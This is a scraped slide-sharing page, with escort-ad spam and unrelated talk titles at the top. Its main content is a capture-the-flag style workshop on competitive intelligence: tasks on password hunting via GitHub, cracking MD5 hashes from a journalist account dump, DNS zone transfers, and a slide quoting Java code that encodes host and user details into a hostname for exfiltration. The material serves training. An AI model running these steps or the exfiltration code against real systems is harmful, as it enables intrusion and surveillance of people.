Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 

Security Hole #11 - Competitive intelligence - Beliaiev

  • 1.
  • 3. What is Competitive Intelligence(CI)?
  • 4.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11. Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
  • 12. Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
  • 13. Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
  • 14. We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
  • 15. Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
  • 16. Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
  • 18.
  • 19.
  • 20. Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
  • 21. Task #5. Find the hacker
  • 22. • Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
  • 26. Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
  • 27. Tasks from PHDays + WebRTC (net.ipcalf.com)
  • 29. ? ?